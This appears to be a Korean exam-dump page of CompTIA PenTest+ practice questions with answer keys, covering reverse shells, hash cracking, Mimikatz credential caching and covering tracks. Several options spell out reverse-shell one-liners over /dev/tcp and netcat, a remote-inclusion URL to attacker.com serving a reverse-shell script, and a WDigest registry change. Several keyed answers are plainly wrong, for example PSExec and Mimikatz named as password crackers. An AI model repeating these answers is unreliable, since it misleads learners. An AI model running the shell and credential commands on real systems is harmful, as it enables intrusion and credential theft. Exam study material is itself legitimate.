최신 PT0-001 무료덤프 - CompTIA PenTest+ Certification

문제1

A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester mostly like use?

A. perl -e ' use SOCKET'; $i='<SOURCEIP>; $p='443;

B. bash -i >& /dev/tcp/<DESTINATIONIP>/ 443 0>&1

C. ssh superadmin@<DESTINATIONIP> -p 443

D. nc -e /bin/sh <SOURCEIP> 443

정답: A

설명: (DumpTOP 회원만 볼 수 있음)

문제2

A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy requirements to perform the test after major architectural changes. Which of the following is the BEST way to approach the project?

A. Design a penetration test approach, focusing on publicly released firewall DoS vulnerabilities.

B. Focus on an objective-based approach to assess network assets with a red team.

C. Perform a discovery scan to identify changes in the network.

D. Review the firewall configuration, followed by a targeted attack by a read team.

정답: B

문제3

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?

A. Double URL encode the parameters.

B. Implement a blacklist.

C. Stop external calls from the application.

D. Block URL redirections.

정답: D

문제4

A tester was able to retrieve domain users' hashes. Which of the following tools can be used to uncover the users' passwords? (Choose two.)

A. PSExec

B. Mimikatz

C. John the Ripper

D. Hydra

E. Hashcat

F. Nessus

정답: A,B

문제5

A penetration tester is using the Onesixtyone tool on Kali Linux to try to exploit the SNMP protocol on a target that has SNMP enabled Which of the following types of attacks is the penetration tester performing?

A. Name resolution attack

B. Dictionary-based attack

C. Buffer overflow attack

D. Man-in-the-middle attack

정답: B

문제6

A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

A. dsquery -o -rein -limit 21

B. dsuser -name -account -limit 3

C. dsquery uaer -inactive 3

D. dsrm -users "DN=compony.com; OU=hq CN=usera"

정답: C

문제7

An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used m this attack?

A. Principle of authority

B. Principle of fear

C. Principle of social proof

D. Principle of likeness

E. Principle of scarcity

정답: A

문제8

During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.
Which of the following registry changes would allow for credential caching in memory?

A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0

B. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1

C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1

D. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1

정답: A

문제9

An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK Which of the following attack vectors would the attacker MOST likely use?

A. Capture a three-way handshake and crack it

B. Capture a mobile device and crack its encryption

C. Create a rogue wireless access point

D. Capture a four-way handshake and crack it

정답: D

문제10

A client gives a penetration tester a /8 network range to scan during a week-long engagement. Which of the following tools would BEST complete this task quickly?

A. Angry IP scanner

B. Nmap

C. Unicorn scan

D. Massscan

정답: D

문제11

A penetration tester is outside of an organization's network and is attempting to redirect users to a fake password reset website hosted on the penetration tester's box. Which of the following techniques is suitable to attempt this?

A. Perform ARP spoofing.

B. Conduct a phishing campaign.

C. Employ NBNS poisoning.

D. Use an SSL downgrade attack.

정답: B

문제12

A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

A. Download the GHOST file to a Linux system and compilegcc -o GHOSTtest i:./GHOST

B. Download the GHOST file to a Windows system and compilegcc -o GHOST GHOST.ctest i:./GHOST

C. Download the GHOST file to a Windows system and compilegcc -o GHOSTtest i:./GHOST

D. Download the GHOST file to a Linux system and compilegcc -o GHOST.ctest i:./GHOST

정답: D

문제13

Which of the following commands will allow a tester to enumerate potential unquoted services paths on a host?

A. wmic service get name, displayname, patchname, startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

B. wmic service get /format:hform > c:\temp\services.html

C. wmic startup get caption, location, command | findstr /i "service" | findstr /v /i "%"

D. wmic environment get name, variablevalue, username / findstr /i "Path" | findstr /i "service"

정답: A

설명: (DumpTOP 회원만 볼 수 있음)

문제14

A penetration tester has successfully exploited an application vulnerability and wants to remove the command history from the Linux session. Which of the following will accomplish this successfully?

A. rm -f ./history

B. history --remove

C. history -c

D. cat history I clear

정답: C

최신 PT0-001 무료덤프 - CompTIA PenTest+ Certification

우리와 연락하기

유용한 링크

최신 업데이트